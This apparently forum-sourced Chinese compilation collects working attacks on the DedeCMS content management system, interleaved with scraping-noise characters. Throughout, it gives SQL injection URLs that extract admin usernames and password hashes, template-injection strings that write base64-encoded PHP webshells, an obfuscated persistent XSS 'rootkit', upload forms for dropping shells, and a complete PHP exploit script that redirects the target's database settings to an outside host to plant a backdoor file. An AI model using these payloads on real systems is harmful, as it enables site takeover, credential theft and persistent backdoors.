dedecms漏洞总结

admin

Dedecms 5.6 rss注入漏洞
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1




. \2 u: L1 w4 y4 T; ^: k

1 v9 k6 G1 a. J
: D; r3 o" G" @1 p2 T
5 T0 `' q9 o  k- n7 }( `9 eDedeCms v5.6 嵌入恶意代码执行漏洞
注册会员，上传软件：本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
( V3 M/ s- m2 ?4 x4 D9 o发表后查看或修改即可执行
1 i; Z2 o! \# k1 |0 ja{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
( v: n2 c8 U3 i, m7 B9 C生成x.php 密码xiao，直接生成一句话。
8 A  V, f9 s8 R+ D7 [4 D+ N




4 t# N& Y- x6 r$ }9 X. I% y
; `0 l8 f2 D! G. L8 |$ O  h9 O1 ^
; p2 Z6 i% s7 h# y# R3 U$ @
2 H8 K: g, s% M+ S4 LDede 5.6 GBK SQL注入漏洞
4 G8 c' l4 n, v3 \2 R+ K& N  a$ R( ?' uhttp://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
7 c9 |% g/ N- c' _: W9 phttp://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
, B! ?/ g1 ~. u$ W
. p- u* I5 J2 P/ j' ?
# P% N) [  |9 T( h


) b6 k0 P9 L8 U  ]' T$ q
  F, T; z, h( p6 U9 c+ V

8 `9 P; _, |0 Z" x8 P2 }DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
" k6 l$ e) U2 k$ m
$ k- V, J' t3 s+ ^. o

: J& s( K6 r$ Z6 v# M9 f

! J) ?8 T3 Q4 A  K/ z
, Q( C" m# c! h1 \DEDECMS 全版本 gotopage变量XSS漏洞
1.复制粘贴下面的URL访问，触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞，需关闭XSS筛选器。
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
+ {: T7 ?% @# h9 {% z

# c8 ~/ C& \  j+ h7 }, {* T5 k3 q2.关闭浏览器，无论怎么访问下面的任意URL，都会触发我们的XSS。
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
) z! Y, r+ x8 w  {& O
1 j% @) t& V1 N9 B& P/ e
9 w- c  o1 I" C* n  Y. Yhttp://v57.demo.dedecms.com/dede/login.php
9 t6 Y# x2 X4 M( ]

  v# B. p7 M- e. u  {color=Red]DeDeCMS(织梦)变量覆盖getshell
#!usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
# F' h' }' x9 r1 VDEDEcms Variable Coverage
5 O- w: `6 u7 r$ Q* TExploit Author: www.heixiaozi.comwww.webvul.com
: [. H% ^$ i  }) H; o. I6 _, ^);
9 l6 d) m/ U0 f$ R0 [echo "\r\n";
if($argv[2]==null){
print_r('
/ O6 v9 N$ j+ l- A. I. l. a+---------------------------------------------------------------------------+
$ }: x+ J9 O) o' g5 S$ YUsage: php '.$argv[0].' url aid path
5 v: j" r" c/ q$ U5 Q7 faid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
: C0 I* W* {3 ZExample:
, x9 m$ a. B) J" T$ Y% _; G1 a7 gphp '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
' O! Q* L0 ^: f) i& w4 S');
exit;
- N+ k9 J( y/ k( Y* \6 K; t}
$url=$argv[1];
0 X+ d! t+ c7 E$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
if (strpos($exp,"OK")>12){
+ F& L% G7 T8 d' P1 d$ |! |- R( _echo "
6 ~9 `/ g' k! BExploit Success \n";
2 x6 U& K1 y: T0 _3 O% ?if($aid==1)echo "
Shell:".$url."/$path/data/cache/fuck.php\n" ;


& E* B7 o4 y% ?4 Z3 q) ^if($aid==2)echo "
1 R/ s; v" H* L; j4 D* tShell:".$url."/$path/fuck.php\n" ;

- s) Z" |: Y* |8 o
$ i$ F) V1 }6 S+ j7 W9 v- T7 Qif($aid==3)echo "
Shell:".$url."/$path/plus/fuck.php\n";
9 Q+ L- x8 S6 f
! `0 v6 P: A- q6 |, y
}else{
echo "
1 k- v# n7 ?3 e  H2 u2 HExploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
, r' q7 [' d, h( a! k$port="80";
' v9 c2 H7 a. |2 i, I2 M7 R% B$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
4 U' V$ w! c, ]9 [/ M: |- f$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
: c  v& ~2 l/ t+ U) G( z4 F  U  p7 S2 e$ock=fsockopen($host,$port);
! a+ F$ @" ]8 e% K( @if (!$ock) {
echo "
No response from ".$host."\n";
}
fwrite($ock,$data);
4 {6 O3 Y! W; {8 H5 a2 |) ~. \* Q' uwhile (!feof($ock)) {
$exp=fgets($ock, 1024);
- ]% D; t1 a0 Q  Y* q, p; Greturn $exp;
}
+ C: Y, \$ r4 ?1 g1 P}
8 i3 G* a) Q7 \$ O; S& j

9 W  m  {* O& Y6 x' [! s?>



" }5 {) h# k& @7 Q5 f

! d+ a4 g  `6 {$ C% h6 M& v5 n



+ T0 @  {: X5 A" ^( ]
$ m' n6 Q6 [0 r) Y% LDedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root


8 _! n+ x/ V. N! C' @  a4 g把上面validate=dcug改为当前的验证码，即可直接进入网站后台
. {( t1 c7 O% p- ^8 {: l6 K

" Z* @6 g+ q, h此漏洞的前提是必须得到后台路径才能实现
: c" @" x5 P! m* e


) o" Q& M3 Y+ C6 H8 Q




9 j; F9 E6 c" _/ J! b% h
9 V2 x5 M7 a2 ?6 y- S+ b
Dedecms织梦 标签远程文件写入漏洞
5 L! s" ?! Q) @# F' ~前题条件，必须准备好自己的dede数据库，然后插入数据： insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');

! d( Y) y9 I; i5 n, \
) I3 r7 F% j: D1 J再用下面表单提交，shell 就在同目录下 1.php。原理自己研究。。。
" Y4 Z! g8 Z0 ]) c<form action="" method="post" name="QuickSearch" id="QuickSearch">
- {4 P: G) M8 s  w  o1 D, \<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
2 }# y" c/ c" [6 z: ^: m<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
$ k; V) b$ a3 p<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
6 u# [1 c$ i& X+ ]0 D. C<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
- l/ W, {3 G1 f<input type="text" value="true" name="nocache" style="width:400">
. f! d/ U0 _  B<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
8 O3 ?8 T6 g9 g+ r+ S8 @function addaction()
# U7 }# F$ A1 t2 l{
# e* F5 R/ P% u1 ~9 _( }# y7 {document.QuickSearch.action=document.QuickSearch.doaction.value;
}
2 u. z- {+ ~& D! ~3 p</script>
! C2 S" d, R+ O4 Q3 n
" ?5 o  {# I: c8 p0 N5 Y: M


6 H! }: Z2 g+ p8 B+ m/ t' Q
. Y1 t3 P- Z0 ~/ A8 w' H9 y2 R




DedeCms v5.6 嵌入恶意代码执行漏洞
注册会员，上传软件：本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}，发表后查看或修改即可执行
/ y5 q9 ~/ n5 f$ g' Sa{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
生成x.php 密码：xiao直接生成一句话。密码xiao 大家懂得
* ^0 ?6 q6 H% m9 tDedecms <= V5.6 Final模板执行漏洞
注册一个用户，进入用户管理后台，发表一篇文章，上传一个图片，然后在附件管理里，把图片替换为我们精心构造的模板，比如图片名称是：
uploads/userup/2/12OMX04-15A.jpg
! o! w0 V, o5 d

  \5 U$ E6 X2 q# z5 K( u* |模板内容是（如果限制图片格式，加gif89a）：
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
8 m: i7 r3 ]9 E8 x0 _, w, A@fclose($fp);
{/dede:name}
# n  R0 u* S# O# e. Y, I2 修改刚刚发表的文章，查看源文件，构造一个表单：
! L% O' g2 k" N$ B; a" o<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
# E* e) x  g/ `7 B) c<input type="hidden" name="channelid" value="1" />
  r7 t% x! h* z% {6 N; ^6 l, [<input type="hidden" name="oldlitpic" value="" />
) S2 k8 r! {  g8 E( c<input type="hidden" name="sortrank" value="1275972263" />


<div id="mainCp">
; _# x  [' v" A; ^# K1 i& c% ^& e<h3 class="meTitle"><strong>修改文章</strong></h3>

2 I( j# B6 n- e
<div class="postForm">
7 i/ W7 {1 w* I6 l<label>标题：</label>
( N. S7 z3 H9 ]<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>

0 L5 v  R+ W. k
<label>标签TAG：</label>
) u8 ]& C5 o) a0 V9 o( m<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)


<label>作者：</label>
" z4 G9 g4 W, V+ T3 }- L<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>


<label>隶属栏目：</label>
<select name='typeid' size='1'>
9 L' i0 k+ I5 D& \8 a" W+ M3 n<option value='1' class='option3' selected=''>测试栏目</option>
2 @3 G6 r8 C6 s3 k</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
9 F4 R) z4 U2 J3 U# ~7 \4 @/ l

( A1 g, m3 N2 f0 J. t2 b<label>我的分类：</label>
( |- |. o4 q* P1 U. s0 d<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>


9 S1 M: B2 K8 N' ?<label>信息摘要：</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)

1 g5 B9 b% Z; G" ~( _/ k2 u4 l
1 s0 r% \: R. r8 x9 K<label>缩略图：</label>
: S# c9 n  d+ w7 w5 H% y<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
# j( V. o) _7 i" g* ?, C

( E: r( @4 P0 S, q- @7 C. [! L9 [<input type='text' name='templet'
6 u# s; C2 n2 h4 {; M/ M' u5 n9 hvalue="../ uploads/userup/2/12OMX04-15A.jpg">
% [2 ], ^9 i* Z5 y2 S<input type='text' name='dede_addonfields'
+ {" _6 f. b: E( q8 Dvalue="templet,htmltext;">（这里构造）
</div>


<!-- 表单操作区域 -->
/ d5 A& U) ^* Y* N$ [$ ~<h3 class="meTitle">详细内容</h3>


<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>


$ |: z- ]+ s2 K7 q. o+ J7 C& c' }<label>验证码：</label>
& u& z! N/ u/ [: o6 v<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清？点击更换" align="absmiddle" style="cursor:pointer" />
/ B2 M8 b7 e" k% ^

& X! \# c: O6 U/ \  ]  a3 {- R<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>

! E; r7 }& E; [7 h) \% n( |) L
! T. _# _9 D8 k+ S1 Q$ G</div>
9 Q- ?5 z$ b1 z6 W
% }7 K# u8 b1 p8 I" d6 X2 A  z0 X
8 |- p9 t- K" o: d% N  g</form>
. _/ E6 l9 P' d. J8 z1 j( H: H
. C' p3 y5 ^1 `! x3 V6 n
提交，提示修改成功，则我们已经成功修改模板路径。 3 访问修改的文章：
2 ^, j% x6 \# z: Z0 K- U假设刚刚修改的文章的aid为2，则我们只需要访问：
http://127.0.0.1/dede/plus/view.php?aid=2
即可以在plus目录下生成webshell：1.php
1 k; f' U8 T* ?8 i
" M& {! w: C- v6 r
& v* K+ h) t0 x: U9 A& R9 @1 {' z
( r; T0 |. ~6 Y) v( L: L; x" @
  L& Y- j) ?- H$ W
/ B$ V9 L1 ]" A: j  D

' \  T; a! R2 V) `! s
: r4 I/ U+ z- Y. e( q, Y
6 ]  U% T7 N+ ^8 c: Y
6 O9 I. W$ I  u5 n( y# T7 m6 p

4 l8 E! Z' n$ _9 D9 p7 R  s% q/ q, fDEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
8 x+ X  F- `9 ^Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
! f* b& T; q+ h5 r2 A{/dede:field}
保存为1.gif
% {& L1 x: D$ U/ V8 x2 N+ E<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
<input type="hidden" name="aid" value="7" />
/ c; ?2 K/ f9 d9 H2 _! I, [<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
) N: i( d" k* L3 i) B' q<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
' g" x# g+ p# n. i+ k# E& X" W<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
1 l8 R* Q: G: x: f) Y8 |</form>
' F$ Y0 s" p6 j+ j/ @# }) l4 {* i
9 w2 B7 R& N5 n: i% a; b
9 K8 l/ M9 P! S$ K  X  J# |构造如上表单，上传后图片保存为/uploads/userup/3/1.gif
发表文章，然后构造修改表单如下：
5 D. J5 a2 @/ s5 K+ Z* a
" R2 @- v( H( W% A" N6 j9 S  I0 O- `
6 l1 S/ e% h4 A% ^0 W0 b$ G9 R<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
/ O' Q" m7 P1 s<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
: V% [; G1 _6 C5 m3 C<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
! \5 M4 E8 w1 U<input type="hidden" name="channelid" value="1" />
4 w- V* k+ y2 q7 X; K' v' v2 F<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
% i9 g+ w; G, R- ^; Z. O<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
( D* R9 o/ [- ?% E: \6 W! o4 [<select name='typeid' size='1'>
. G2 b$ W. Z& J. I, j<option value='1' class='option3' selected=''>Test</option>
<select name='mtypesid' size='1'>
( f$ B- n, o( R- _- C: B+ ]" K<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
# S& U% `0 ?3 z<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
8 _. r8 q$ d) \- Y% ?1 D" z. v# h( k- j<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
9 _! N( i+ b0 O. t1 U3 @( L( w<button class="button2" type="submit">提交</button>
+ ]! z( J" o2 z2 W  Y</form>



! l7 A) l2 U2 {# h

' ~' e% I* ^, m7 V2 N


1 V# P4 J1 H/ y- P

8 B+ f4 r3 W( }6 w/ m( f

0 v* u% A4 b. Q3 M织梦(Dedecms)V5.6 远程文件删除漏洞
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
- ~$ ^  M" U2 J/ B
+ S" Y) I6 o9 K9 f" [9 V, z
  Q& E% V5 B) H  t







织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
http://www.test.com/plus/carbuya ... urn&code=../../
& Z  v. D/ \6 ^/ E
2 Z, A* G2 b$ f9 e
3 T+ Y8 D+ {* O, u1 X: q0 o
/ }# M; z9 K1 e7 j$ _  {% O
  L4 ]5 [# G2 R3 N1 \


* O2 j4 X8 t, s; C& a: _+ c, ?3 X# E

+ U" K: K7 k+ T$ l% \" a
( W  S' C  Y; K  M6 C& l* MDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
$ s; G* f1 ^9 ^! K/ _$ E/ A密码是32位MD5减去头5位，减去尾七位，得到20 MD5密码，方法是，前减3后减1，得到16位MD5

- P" H; u2 a/ A) p$ y

) W. @8 x; j7 ^8 W: O" h
1 W) K+ s/ W$ q, f

4 V; e6 w, J6 q- b/ b% y
! P: f- a/ D8 y" f+ K# j
5 E! M3 `) u( R: z, V% w# i5 @
1 Y7 k$ {% o% `0 \
/ p& u$ b, E, F. p织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
: f- L! N# J$ t; x5 o0 P
4 l% L9 _1 n" k7 s7 }
0 R0 d% ~0 X7 X7 U

+ ?. @- z4 q$ M6 r
% g" r% N3 l+ w. R2 e0 C9 @# y
& f5 B4 n+ c2 H, o


1 ?; m- r5 ?1 I$ ^2 |0 }5 S8 u
( s5 W( x( a  T% }) i- E  g) y织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
<html>
1 T5 H$ n! C4 n& e+ t- X<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
6 ~6 D) B% i1 ~, D! x. Z6 s0 r<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
, W) p) i/ r$ D" G; q<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
0 \; R9 C/ i8 t0 @( e* K+ c<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
1 o) f6 m- U. ?/ ^/ O<input type='hidden' name='job' value='upload' />
4 f/ W# g( m$ V$ m0 a<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
+ ^* h6 R  u6 A9 [: ?<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
0 F$ m& t/ c# X% c* J. CFun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>




& f5 P5 ~2 c9 ]* ^
% o( B- P0 U( \6 x) f


- z0 ^/ {+ G2 M1 C' a" l* T# @, D

织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
; X; H. L9 P" l& k' G1. 访问网址：
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
) N0 I$ ]; E5 z8 E: U- @* I$ y" L可看见错误信息
$ w2 c% ?' `( c3 J/ [
" [+ S) G! D0 `$ O) Z* e
$ A2 p, m& A2 H2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
0 r" H6 h2 ^3 e" j7 P/ S+ Eint(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
9 |, s2 A" _, J; v. I$ @! i

; E; x% Z; h1 v3. 执行dede.rar里的文件 test.html，注意 form 中 action 的地址是

- f  d# d' |; G( t, m1 T( M
- E9 }1 @( X+ v: S( r<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
1 f2 B) F- t) Y- w, @! k) \

按确定后的看到第2步骤的信息表示文件木马上传成功.

2 F& x  A2 T( r! l8 g
% s! k& d/ E) N7 k% S+ g
. }* k: q2 \7 ?1 N' C4 a+ O

: f9 q4 r7 f' c0 L+ Z






织梦(DedeCms)plus/infosearch.php 文件注入漏洞
& y# u0 e) r- l( Mhttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*